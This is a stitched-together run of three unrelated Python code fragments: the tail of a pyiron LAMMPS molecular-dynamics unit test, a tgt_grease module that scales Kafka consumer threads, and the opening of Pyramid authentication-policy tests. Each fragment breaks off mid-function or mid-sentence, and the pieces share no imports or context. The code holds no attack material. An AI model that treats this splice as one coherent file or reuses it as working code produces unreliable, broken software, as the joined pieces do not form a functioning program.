self.job.calc_md(temperature=350, seed=0)
with self.assertRaises(ValueError):
self.job.calc_md(temperature=[0, 100])
with self.assertRaises(ValueError):
self.job.calc_md(pressure=0)
with self.assertRaises(ValueError):
self.job.calc_md(temperature=[0, 100, 200])
self.job.calc_md(
temperature=350,
initial_temperature=350,
time_step=1,
n_ionic_steps=1000,
n_print=200,
)
file_directory = os.path.join(
self.execution_path, "..", "static", "lammps_test_files"
)
self.job.restart_file_list.append(
os.path.join(file_directory, "dump.out")
)
self.job.restart_file_list.append(
os.path.join(file_directory, "log.lammps")
)
self.job.run(run_mode="manual")
self.job.status.collect = True
self.job.run()
nodes = [
"positions",
"temperature",
"energy_tot",
"energy_pot",
"steps",
"positions",
"forces",
"cells",
"pressures",
"unwrapped_positions",
]
with self.job.project_hdf5.open("output/generic") as h_gen:
hdf_nodes = h_gen.list_nodes()
self.assertTrue(all([node in hdf_nodes for node in nodes]))
self.assertTrue(
np.array_equal(self.job["output/generic/positions"].shape, (6, 81, 3))
)
self.assertTrue(
np.array_equal(
self.job["output/generic/positions"].shape,
self.job["output/generic/forces"].shape,
)
)
self.assertEqual(len(self.job["output/generic/steps"]), 6)
def test_dump_parser_water(self):
water = self._build_water(y0_shift=0.01)
self.job.structure = water
with self.assertWarns(UserWarning):
self.job.potential = "H2O_tip3p"
self.job.calc_md(
temperature=350,
initial_temperature=350,
time_step=1,
n_ionic_steps=1000,
n_print=200,
pressure=0,
)
self.assertFalse('nan' in self.job.input.control['fix___ensemble'])
file_directory = os.path.join(
self.execution_path, "..", "static", "lammps_test_files"
)
self.job.restart_file_list.append(
os.path.join(file_directory, "log.lammps")
)
self.job.restart_file_list.append(
os.path.join(file_directory, "dump.out")
)
self.job.run(run_mode="manual")
self.job.status.collect = True
self.job.run()
positions = np.loadtxt(os.path.join(file_directory, "positions_water.dat"))
positions = positions.reshape(len(positions), -1, 3)
forces = np.loadtxt(os.path.join(file_directory, "forces_water.dat"))
forces = forces.reshape(len(forces), -1, 3)
self.assertTrue(
np.allclose(
self.job["output/generic/unwrapped_positions"], positions
)
)
uc = UnitConverter(self.job.input.control["units"])
self.assertTrue(
np.allclose(self.job["output/generic/forces"], uc.convert_array_to_pyiron_units(forces,
"forces"))
)
self.assertEqual(self.job["output/generic/energy_tot"][-1], -5906.46836142123 *
uc.lammps_to_pyiron("energy"))
self.assertEqual(self.job["output/generic/energy_pot"][-1], -5982.82004785158 *
uc.lammps_to_pyiron("energy"))
self.assertAlmostEqual(self.job["output/generic/pressures"][-2][0, 0], 515832.570508186 /
uc.pyiron_to_lammps("pressure"), 2)
self.job.write_traj(filename="test.xyz",
file_format="xyz")
atom_indices = self.job.structure.select_index("H")
snap_indices = [1, 3, 4]
orig_pos = self.job.output.positions
self.job.write_traj(filename="test.xyz",
file_format="xyz",
atom_indices=atom_indices,
snapshot_indices=snap_indices)
self.job.write_traj(filename="test.xyz",
file_format="xyz",
atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=np.zeros_like(orig_pos))
self.assertRaises(ValueError, self.job.write_traj, filename="test.xyz",
file_format="xyz",
atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=np.zeros_like(orig_pos)[:-1])
self.job.write_traj(filename="test.xyz",
file_format="xyz",
atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=np.zeros_like(orig_pos),
overwrite_cells=self.job.trajectory()._cells)
self.job.write_traj(filename="test.xyz",
file_format="xyz",
atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=np.zeros_like(orig_pos)[:-1],
overwrite_cells=self.job.trajectory()._cells[:-1])
self.assertRaises(ValueError, self.job.write_traj, filename="test.xyz",
file_format="xyz",
atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=np.zeros_like(orig_pos),
overwrite_cells=self.job.trajectory()._cells[:-1])
os.remove("test.xyz")
self.assertTrue(np.array_equal(self.job.trajectory()._positions,
orig_pos))
self.assertTrue(np.array_equal(self.job.trajectory(stride=2)._positions,
orig_pos[::2]))
self.assertTrue(np.array_equal(
self.job.trajectory(atom_indices=atom_indices,
snapshot_indices=snap_indices)._positions,
orig_pos[snap_indices][:, atom_indices, :]))
nx, ny, nz = orig_pos.shape
random_array = np.random.rand(nx, ny, nz)
random_cell = np.random.rand(nx, 3, 3)
self.assertTrue(np.array_equal(
self.job.trajectory(atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=random_array)._positions,
random_array[snap_indices][:, atom_indices, :]))
self.assertTrue(np.array_equal(
self.job.trajectory(atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=random_array,
overwrite_cells=random_cell)._cells,
random_cell[snap_indices]))
self.assertIsInstance(self.job.get_structure(-1), Atoms)
# Test for clusters
with self.job.project_hdf5.open("output/generic") as h_out:
h_out["cells"] = None
self.assertTrue(np.array_equal(
self.job.trajectory(atom_indices=atom_indices,
snapshot_indices=snap_indices)._positions,
orig_pos[snap_indices][:, atom_indices, :]))
with self.job.project_hdf5.open("output/generic") as h_out:
h_out["cells"] = np.repeat([np.array(water.cell)], len(h_out["positions"]), axis=0)
self.assertTrue(np.array_equal(
self.job.trajectory(atom_indices=atom_indices,
snapshot_indices=snap_indices)._positions,
orig_pos[snap_indices][:, atom_indices, :]))
neigh_traj_obj = self.job.get_neighbors()
self.assertTrue(np.allclose(np.linalg.norm(neigh_traj_obj.vecs, axis=-1),
neigh_traj_obj.distances))
h_indices = self.job.structure.select_index("H")
o_indices = self.job.structure.select_index("O")
self.assertLessEqual(neigh_traj_obj.distances[:, o_indices, :2].max(), 1.2)
self.assertGreaterEqual(neigh_traj_obj.distances[:, o_indices, :2].min(), 0.8)
self.assertTrue(np.alltrue([np.in1d(np.unique(ind_mat.flatten()), h_indices) for ind_mat in
neigh_traj_obj.indices[:, o_indices, :2]]))
neigh_traj_obj_snaps = self.job.get_neighbors_snapshots(snapshot_indices=[2, 3, 4])
self.assertTrue(np.allclose(neigh_traj_obj.vecs[2:], neigh_traj_obj_snaps.vecs))
neigh_traj_obj.to_hdf(self.job.project_hdf5)
neigh_traj_obj_loaded = self.job["neighbors_traj"].to_object()
# self.assertEqual(neigh_traj_obj._init_structure, neigh_traj_obj_loaded._init_structure)
self.assertEqual(neigh_traj_obj._num_neighbors, neigh_traj_obj_loaded._num_neighbors)
self.assertTrue(np.allclose(neigh_traj_obj.indices, neigh_traj_obj_loaded.indices))
self.assertTrue(np.allclose(neigh_traj_obj.distances, neigh_traj_obj_loaded.distances))
self.assertTrue(np.allclose(neigh_traj_obj.vecs, neigh_traj_obj_loaded.vecs))
self.assertTrue(self.job.units, "real")
def test_dump_parser(self):
structure = Atoms(
elements=2 * ["Fe"],
cell=2.78 * np.eye(3),
positions=2.78 * np.outer(np.arange(2), np.ones(3)) * 0.5,
)
self.job.structure = structure
self.job.potential = self.job.list_potentials()[0]
file_directory = os.path.join(
self.execution_path, "..", "static", "lammps_test_files"
)
self.job.collect_dump_file(cwd=file_directory, file_name="dump_static.out")
self.assertTrue(
np.array_equal(self.job["output/generic/forces"].shape, (1, 2, 3))
)
self.assertTrue(
np.array_equal(self.job["output/generic/positions"].shape, (1, 2, 3))
)
self.assertTrue(
np.array_equal(self.job["output/generic/cells"].shape, (1, 3, 3))
)
self.assertTrue(
np.array_equal(self.job["output/generic/indices"].shape, (1, 2))
)
def test_vcsgc_input(self):
unit_cell = Atoms(
elements=['Al', 'Al', 'Al', 'Mg'],
positions=[
[0., 0., 0.],
[0., 2., 2.],
[2., 0., 2.],
[2., 2., 0.]
],
cell=4 * np.eye(3)
)
self.job.structure = unit_cell
self.job.potential = self.job.list_potentials()[0]
symbols = self.job.input.potential.get_element_lst()
with self.subTest("Fail when elements outside the periodic table are used"):
bad_element = {s: 0. for s in symbols}
bad_element.update({'X': 1.}) # Non-existant chemical symbol
self.assertRaises(ValueError, self.job.calc_vcsgc, mu=bad_element, temperature_mc=300.)
self.assertRaises(ValueError, self.job.calc_vcsgc, target_concentration=bad_element, temperature_mc=300.)
with self.subTest("Fail when concentrations don't add to 1"):
bad_conc = {s: 0. for s in symbols}
bad_conc['Al'] = 0.99
self.assertRaises(ValueError, self.job.calc_vcsgc, target_concentration=bad_conc, temperature_mc=300.)
with self.subTest("Check window definitions"):
for bad_window in [-1, 1.1]:
self.assertRaises(ValueError, self.job.calc_vcsgc, window_moves=bad_window, temperature_mc=300.)
self.assertRaises(ValueError, self.job.calc_vcsgc, window_size=0.3, temperature_mc=300.)
with self.subTest("Temperature can't be None"):
mu = {s: 0. for s in symbols}
mu[symbols[0]] = 1.
self.assertRaises(ValueError, self.job.calc_vcsgc, mu=mu, temperature_mc=None, temperature=None)
args = dict(
mu=mu,
target_concentration=None,
kappa=1000.0,
mc_step_interval=100,
swap_fraction=0.1,
temperature_mc=None,
window_size=None,
window_moves=None,
seed=1,
temperature=300.0,
)
input_string = 'all sgcmc {0} {1} {2} {3} randseed {4}'.format(
args['mc_step_interval'],
args['swap_fraction'],
args['temperature'],
' '.join([str(args['mu'][symbol] - args['mu'][symbols[0]]) for symbol in symbols[1:]]),
args['seed']
)
self.job.calc_vcsgc(**args)
self.assertEqual(
self.job.input.control['fix___vcsgc'], input_string,
msg="Parser did not reproduce expected lammps control syntax"
)
args['temperature_mc'] = 100.
input_string = 'all sgcmc {0} {1} {2} {3} randseed {4}'.format(
args['mc_step_interval'],
args['swap_fraction'],
args['temperature_mc'],
' '.join([str(args['mu'][symbol] - args['mu'][symbols[0]]) for symbol in symbols[1:]]),
args['seed']
)
self.job.calc_vcsgc(**args)
self.assertEqual(
self.job.input.control['fix___vcsgc'], input_string,
msg="Parser did not reproduce expected lammps control syntax"
)
conc = {s: 0. for s in symbols}
conc[symbols[0]] = 0.5
conc[symbols[-1]] = 0.5
args['target_concentration'] = conc
input_string += ' variance {0} {1}'.format(
args['kappa'],
' '.join([str(conc[symbol]) for symbol in symbols[1:]])
)
self.job.calc_vcsgc(**args)
self.assertEqual(
self.job.input.control['fix___vcsgc'], input_string,
msg="Parser did not reproduce expected lammps control syntax"
)
args['window_moves'] = 10
input_string += ' window_moves {0}'.format(args['window_moves'])
self.job.calc_vcsgc(**args)
self.assertEqual(
self.job.input.control['fix___vcsgc'], input_string,
msg="Parser did not reproduce expected lammps control syntax"
)
args['window_size'] = 0.75
input_string += ' window_size {0}'.format(args['window_size'])
self.job.calc_vcsgc(**args)
self.assertEqual(
self.job.input.control['fix___vcsgc'], input_string,
msg="Parser did not reproduce expected lammps control syntax"
)
self.job.to_hdf()
for k, v in args.items():
if k not in ("mu", "target_concentration", "mc_step_interval", "swap_fraction", "temperature_mc"):
continue
self.assertEqual(
self.job._generic_input[k], v,
msg=f"Wrong value stored in generic input for parameter {k}!"
)
# decode saved GenericParameters manually...
data = self.job["input/generic/data_dict"]
self.assertEqual(
data["Value"][data["Parameter"].index(k)], str(v),
msg=f"Wrong value stored in HDF for parameter {k}!"
)
def test_calc_minimize_input(self):
| |
<filename>tgt_grease/enterprise/Model/KafkaSource.py
import json
from time import time
import threading
from multiprocessing import Pipe
import kafka
from kafka import KafkaConsumer
from tgt_grease.core import GreaseContainer
from tgt_grease.enterprise.Model.CentralScheduling import Scheduling
from .Configuration import PrototypeConfig
MIN_BACKLOG = 50 # If the Kafka message backlog falls below this number, we will kill a consumer
MAX_BACKLOG = 200 # If the Kafka message backlog rises above this number, we will make a consumer
SLEEP_TIME = 5 # Sleep this many seconds after creating or deleting a consumer.
MAX_CONSUMERS = 32 # We wont create more than this number of consumers for any config
class KafkaSource(object):
"""Kafka class for sourcing Kafka messages
This Model will create and dynamically scale the number of Kafka consumers for the topics
in the Config, and then sends the parsed messages (containing only the keys/values specified
in the Config) to Scheduling.
This Model is designed around the Configs. Each Config gets its own config_manager thread,
which means Configs also get their own dedicated consumer. It was designed so that any
"magic numbers" (such as MIN_BACKLOG, MAX_CONSUMERS, etc.) are overwriteable in the Config,
with the exception of SLEEP_TIME, which can be constant accross Configs.
Currently, the class only supports Kafka topics which contain JSON, however this functionality
can easily be expanded on inside of the parse_message method.
Attributes:
ioc (GreaseContainer): IOC for scanning
conf (PrototypeConfig): Prototype configuration instance
configs (List[dict]): List of Kafka Configs
Note:
Currently, only json messages can be decoded from kafka topics
"""
def __init__(self, ioc=None):
if ioc and isinstance(ioc, GreaseContainer):
self.ioc = ioc
else:
self.ioc = GreaseContainer()
self.conf = PrototypeConfig(self.ioc)
self.configs = []
def run(self, config=None):
"""This will load all Kafka configs (unless a specific one is provided) and spin up consumer
threads for all of them.
It should never return anything unless something goes wrong with Kafka consumption.
Creates a thread for each Kafka config to begin parsing messages. This parent thread then
monitors its children, and prunes dead threads. Once all are dead, we return False.
Note:
If a configuration is set then *only* that configuration is parsed. If both are provided then the configuration will *only* be parsed if it is of the source provided.
Args:
config (dict): If set will only parse the specified config
Returns:
bool: False if an error occurs, else never returns
"""
if config:
self.configs = [config]
else:
self.configs = self.get_configs()
if not self.validate_configs(self.configs):
self.ioc.getLogger().error("One or more Kafka Configs are invalid, stopping.")
return False
threads = []
for conf in self.configs:
threads.append(self.create_consumer_manager_thread(conf))
while threads:
threads = list(filter(lambda x: x.is_alive(), threads))
self.ioc.getLogger().critical("All Kafka consumer managers have died, stopping.")
return False
def create_consumer_manager_thread(self, config):
"""Creates and returns a thread running a consumer_manager
Args:
config (dict): Configuration for a Kafka Model
Returns:
threading.Thread: The thread running consumer_manager
"""
KafkaSource.sleep(SLEEP_TIME)
thread = threading.Thread(target=KafkaSource.consumer_manager, args=(self.ioc, config,))
thread.daemon = False
thread.start()
self.ioc.getLogger().info("Kafka consumer manager thread started for config: {0}".format(config.get("name")))
return thread
@staticmethod
def consumer_manager(ioc, config):
"""Creates and reallocates consumer threads within the same consumer group for a single config
Args:
ioc (GreaseContainer): Used for logging since we can't use self in threads
config (dict): Configuration for a Kafka Model
Returns:
bool: False if all consumers are stopped
"""
monitor_consumer = KafkaSource.create_consumer(ioc, config)
threads = [KafkaSource.create_consumer_thread(ioc, config)]
while threads:
KafkaSource.reallocate_consumers(ioc, config, monitor_consumer, threads)
threads = list(filter(lambda x: x[0].is_alive(), threads))
return False
@staticmethod
def create_consumer_thread(ioc, config):
"""Creates a consumer thread, pipe pair for a given config
Args:
ioc (GreaseContainer): Used for logging since we can't use self in threads
config (dict): Configuration for a Kafka Model
Returns:
threading.Thread: The Thread running the Kafka consumer
multiprocessing.Pipe: The parent end of the Pipe used to send a kill signal to the consumer thread
"""
parent_conn, child_conn = Pipe()
thread = threading.Thread(target=KafkaSource.consume, args=(ioc, config, child_conn,))
thread.daemon = True
thread.start()
ioc.getLogger().info("Kafka consumer thread started for config: {0}".format(config.get("name")))
return thread, parent_conn
@staticmethod
def consume(ioc, config, pipe):
"""The Kafka consumer in charge of parsing messages according to the config, then sends the parsed dict to Scheduling
Args:
ioc (GreaseContainer): Used for logging since we can't use self in threads
config (dict): Configuration for a Kafka Model
pipe (multiprocessing.Pipe): Child end of the pipe used to receive signals from parent thread
Returns:
bool: False if kill signal is received
"""
consumer = KafkaSource.create_consumer(ioc, config)
for msg in consumer:
if pipe.poll(): # If the parent pipe sends a signal
ioc.getLogger().trace("Kill signal received, stopping", trace=True)
return False
message_dict = KafkaSource.parse_message(ioc, config, msg)
if message_dict:
KafkaSource.send_to_scheduling(ioc, config, message_dict)
return False
@staticmethod
def sleep(sleep_sec):
"""Thread safe sleep function that waits sleep_sec seconds without affecting child threads
Args:
sleep_sec (int): Number of seconds to idle
"""
wake_time = time() + sleep_sec
while time() < wake_time:
continue
@staticmethod
def create_consumer(ioc, config):
"""Creates a KafkaConsumer object from the params in config
Args:
ioc (GreaseContainer): Used for logging since we can't use self in threads
config (dict): Configuration for a Kafka Model
Returns:
kafka.KafkaConsumer: KafkaConsumer object initialized with params from config
"""
consumer = None
while not consumer:
try:
consumer = KafkaConsumer(
group_id=config.get('name'),
*config.get('topics'),
**{'bootstrap_servers': ",".join(config.get('servers'))}
)
except kafka.errors.NoBrokersAvailable:
ioc.getLogger().error("No Kafka brokers available for config: {0}, retrying.".format(config.get('name')))
KafkaSource.sleep(SLEEP_TIME)
ioc.getLogger().info("Kafka consumer created under group_id: {0}".format(config.get('name')))
KafkaSource.sleep(SLEEP_TIME) # Gives the consumer time to initialize
return consumer
@staticmethod
def parse_message(ioc, config, message):
"""Parses a message from Kafka according to the config
Note:
transform_message extracts only the keys/values from the message as specified in the config. By default, we split the keys by "." - so if you wanted to access the value stored at message[a][b][c], your config would contain the key "a.b.c". You can overwrite the "." key splitter explicitly in your Config. These values will be written to their respective alias also specified in the config.
Args:
ioc (GreaseContainer): Used for logging since we can't use self in threads
config (dict): Configuration for a Kafka model
message (kafka.ConsumerRecord): Individual message received from Kafka topic
Returns:
dict: A flat dictionary containing only the keys/values from the message as specified in the config
"""
try:
message = json.loads(message.value, strict=False)
ioc.getLogger().trace("Message successfully loaded", trace=True)
except ValueError:
ioc.getLogger().trace("Failed to unload message", trace=True)
return {}
final = {}
for key, alias in config.get("key_aliases", {}).items():
pointer = message
for sub_key in key.split(config.get("key_sep", ".")):
if not isinstance(pointer, dict) or sub_key not in pointer:
ioc.getLogger().trace("Subkey: {0} missing from message".format(sub_key), trace=True)
return {}
pointer = pointer[sub_key]
final[alias] = str(pointer)
ioc.getLogger().trace("Message succesfully parsed", trace=True)
return final
@staticmethod
def reallocate_consumers(ioc, config, monitor_consumer, threads):
"""Determines whether to create or kill a consumer based on current message backlog, then performs that action
Args:
ioc (GreaseContainer): Used for logging since we can't use self in threads
config (dict): Configuration for a Kafka model
monitor_consumer (kafka.KafkaConsumer): KafkaConsumer used solely for measuring message backlog
threads (list[(threading.Thread, multiprocessing.Pipe)]): List of current consumer thread/pipe pairs
Returns:
int: Number of threads created (Negative value if a thread was killed)
"""
min_backlog = config.get("min_backlog", MIN_BACKLOG)
max_backlog = config.get("max_backlog", MAX_BACKLOG)
max_consumers = config.get("max_consumers", MAX_CONSUMERS)
backlog1 = KafkaSource.get_backlog(ioc, monitor_consumer)
KafkaSource.sleep(SLEEP_TIME) # We want to wait before checking again in case there is a message spike
backlog2 = KafkaSource.get_backlog(ioc, monitor_consumer)
if backlog1 > max_backlog and backlog2 > max_backlog and len(threads) < max_consumers:
threads.append(KafkaSource.create_consumer_thread(ioc, config))
ioc.getLogger().info("Backlog max reached, spawning a new consumer for {0}".format(config.get('name')), verbose=True)
return 1
elif backlog1 <= min_backlog and backlog2 <= min_backlog and len(threads) > 1:
KafkaSource.kill_consumer_thread(ioc, threads[0])
ioc.getLogger().info("Backlog min reached, killing a consumer for {0}".format(config.get('name')), verbose=True)
return -1
ioc.getLogger().info("No reallocation needed for {0}".format(config.get('name')))
return 0
@staticmethod
def kill_consumer_thread(ioc, thread_tup):
"""Sends a kill signal to the thread's pipe
Note:
Despite being from the multiprocessing library, Pipes are thread safe in this implementation as we don't share the same
end of the Pipe to more than one thread. From the multiprocessing documentation:
The two connection objects returned by Pipe() represent the two ends of the pipe. Each connection object has
send() and recv() methods (among others). Note that data in a pipe may become corrupted if two threads
(or threads) try | |
import unittest
import warnings
from pyramid import testing
from pyramid.compat import (
text_,
bytes_,
)
class TestCallbackAuthenticationPolicyDebugging(unittest.TestCase):
def setUp(self):
from pyramid.interfaces import IDebugLogger
self.config = testing.setUp()
self.config.registry.registerUtility(self, IDebugLogger)
self.messages = []
def tearDown(self):
del self.config
def debug(self, msg):
self.messages.append(msg)
def _makeOne(self, userid=None, callback=None):
from pyramid.authentication import CallbackAuthenticationPolicy
class MyAuthenticationPolicy(CallbackAuthenticationPolicy):
def unauthenticated_userid(self, request):
return userid
policy = MyAuthenticationPolicy()
policy.debug = True
policy.callback = callback
return policy
def test_authenticated_userid_no_unauthenticated_userid(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), None)
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
'pyramid.tests.test_authentication.MyAuthenticationPolicy.'
'authenticated_userid: call to unauthenticated_userid returned '
'None; returning None')
def test_authenticated_userid_no_callback(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne(userid='fred')
self.assertEqual(policy.authenticated_userid(request), 'fred')
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"authenticated_userid: there was no groupfinder callback; "
"returning 'fred'")
def test_authenticated_userid_with_callback_fail(self):
request = DummyRequest(registry=self.config.registry)
def callback(userid, request):
return None
policy = self._makeOne(userid='fred', callback=callback)
self.assertEqual(policy.authenticated_userid(request), None)
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
'pyramid.tests.test_authentication.MyAuthenticationPolicy.'
'authenticated_userid: groupfinder callback returned None; '
'returning None')
def test_authenticated_userid_with_callback_success(self):
request = DummyRequest(registry=self.config.registry)
def callback(userid, request):
return []
policy = self._makeOne(userid='fred', callback=callback)
self.assertEqual(policy.authenticated_userid(request), 'fred')
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"authenticated_userid: groupfinder callback returned []; "
"returning 'fred'")
def test_authenticated_userid_fails_cleaning_as_Authenticated(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne(userid='system.Authenticated')
self.assertEqual(policy.authenticated_userid(request), None)
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"authenticated_userid: use of userid 'system.Authenticated' is "
"disallowed by any built-in Pyramid security policy, returning "
"None")
def test_authenticated_userid_fails_cleaning_as_Everyone(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne(userid='system.Everyone')
self.assertEqual(policy.authenticated_userid(request), None)
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"authenticated_userid: use of userid 'system.Everyone' is "
"disallowed by any built-in Pyramid security policy, returning "
"None")
def test_effective_principals_no_unauthenticated_userid(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request),
['system.Everyone'])
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"effective_principals: unauthenticated_userid returned None; "
"returning ['system.Everyone']")
def test_effective_principals_no_callback(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne(userid='fred')
self.assertEqual(
policy.effective_principals(request),
['system.Everyone', 'system.Authenticated', 'fred'])
self.assertEqual(len(self.messages), 2)
self.assertEqual(
self.messages[0],
'pyramid.tests.test_authentication.MyAuthenticationPolicy.'
'effective_principals: groupfinder callback is None, so groups '
'is []')
self.assertEqual(
self.messages[1],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"effective_principals: returning effective principals: "
"['system.Everyone', 'system.Authenticated', 'fred']")
def test_effective_principals_with_callback_fail(self):
request = DummyRequest(registry=self.config.registry)
def callback(userid, request):
return None
policy = self._makeOne(userid='fred', callback=callback)
self.assertEqual(
policy.effective_principals(request), ['system.Everyone'])
self.assertEqual(len(self.messages), 2)
self.assertEqual(
self.messages[0],
'pyramid.tests.test_authentication.MyAuthenticationPolicy.'
'effective_principals: groupfinder callback returned None as '
'groups')
self.assertEqual(
self.messages[1],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"effective_principals: returning effective principals: "
"['system.Everyone']")
def test_effective_principals_with_callback_success(self):
request = DummyRequest(registry=self.config.registry)
def callback(userid, request):
return []
policy = self._makeOne(userid='fred', callback=callback)
self.assertEqual(
policy.effective_principals(request),
['system.Everyone', 'system.Authenticated', 'fred'])
self.assertEqual(len(self.messages), 2)
self.assertEqual(
self.messages[0],
'pyramid.tests.test_authentication.MyAuthenticationPolicy.'
'effective_principals: groupfinder callback returned [] as groups')
self.assertEqual(
self.messages[1],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"effective_principals: returning effective principals: "
"['system.Everyone', 'system.Authenticated', 'fred']")
def test_effective_principals_with_unclean_principal_Authenticated(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne(userid='system.Authenticated')
self.assertEqual(
policy.effective_principals(request),
['system.Everyone'])
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"effective_principals: unauthenticated_userid returned disallowed "
"'system.Authenticated'; returning ['system.Everyone'] as if it "
"was None")
def test_effective_principals_with_unclean_principal_Everyone(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne(userid='system.Everyone')
self.assertEqual(
policy.effective_principals(request),
['system.Everyone'])
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"effective_principals: unauthenticated_userid returned disallowed "
"'system.Everyone'; returning ['system.Everyone'] as if it "
"was None")
class TestRepozeWho1AuthenticationPolicy(unittest.TestCase):
def _getTargetClass(self):
from pyramid.authentication import RepozeWho1AuthenticationPolicy
return RepozeWho1AuthenticationPolicy
def _makeOne(self, identifier_name='auth_tkt', callback=None):
return self._getTargetClass()(identifier_name, callback)
def test_class_implements_IAuthenticationPolicy(self):
from zope.interface.verify import verifyClass
from pyramid.interfaces import IAuthenticationPolicy
verifyClass(IAuthenticationPolicy, self._getTargetClass())
def test_instance_implements_IAuthenticationPolicy(self):
from zope.interface.verify import verifyObject
from pyramid.interfaces import IAuthenticationPolicy
verifyObject(IAuthenticationPolicy, self._makeOne())
def test_unauthenticated_userid_returns_None(self):
request = DummyRequest({})
policy = self._makeOne()
self.assertEqual(policy.unauthenticated_userid(request), None)
def test_unauthenticated_userid(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred'}})
policy = self._makeOne()
self.assertEqual(policy.unauthenticated_userid(request), 'fred')
def test_authenticated_userid_None(self):
request = DummyRequest({})
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred'}})
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), 'fred')
def test_authenticated_userid_repoze_who_userid_is_None(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':None}})
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid_with_callback_returns_None(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred'}})
def callback(identity, request):
return None
policy = self._makeOne(callback=callback)
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid_with_callback_returns_something(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred'}})
def callback(identity, request):
return ['agroup']
policy = self._makeOne(callback=callback)
self.assertEqual(policy.authenticated_userid(request), 'fred')
def test_authenticated_userid_unclean_principal_Authenticated(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'system.Authenticated'}}
)
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid_unclean_principal_Everyone(self):
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'system.Everyone'}}
)
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), None)
def test_effective_principals_None(self):
from pyramid.security import Everyone
request = DummyRequest({})
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals_userid_only(self):
from pyramid.security import Everyone
from pyramid.security import Authenticated
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred'}})
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request),
[Everyone, Authenticated, 'fred'])
def test_effective_principals_userid_and_groups(self):
from pyramid.security import Everyone
from pyramid.security import Authenticated
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred',
'groups':['quux', 'biz']}})
def callback(identity, request):
return identity['groups']
policy = self._makeOne(callback=callback)
self.assertEqual(policy.effective_principals(request),
[Everyone, Authenticated, 'fred', 'quux', 'biz'])
def test_effective_principals_userid_callback_returns_None(self):
from pyramid.security import Everyone
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'fred',
'groups':['quux', 'biz']}})
def callback(identity, request):
return None
policy = self._makeOne(callback=callback)
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals_repoze_who_userid_is_None(self):
from pyramid.security import Everyone
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':None}}
)
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals_repoze_who_userid_is_unclean_Everyone(self):
from pyramid.security import Everyone
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'system.Everyone'}}
)
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals_repoze_who_userid_is_unclean_Authenticated(
self):
from pyramid.security import Everyone
request = DummyRequest(
{'repoze.who.identity':{'repoze.who.userid':'system.Authenticated'}}
)
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_remember_no_plugins(self):
request = DummyRequest({})
policy = self._makeOne()
result = policy.remember(request, 'fred')
self.assertEqual(result, [])
def test_remember(self):
authtkt = DummyWhoPlugin()
request = DummyRequest(
{'repoze.who.plugins':{'auth_tkt':authtkt}})
policy = self._makeOne()
result = policy.remember(request, 'fred')
self.assertEqual(result[0], request.environ)
self.assertEqual(result[1], {'repoze.who.userid':'fred'})
def test_remember_kwargs(self):
authtkt = DummyWhoPlugin()
request = DummyRequest(
{'repoze.who.plugins':{'auth_tkt':authtkt}})
policy = self._makeOne()
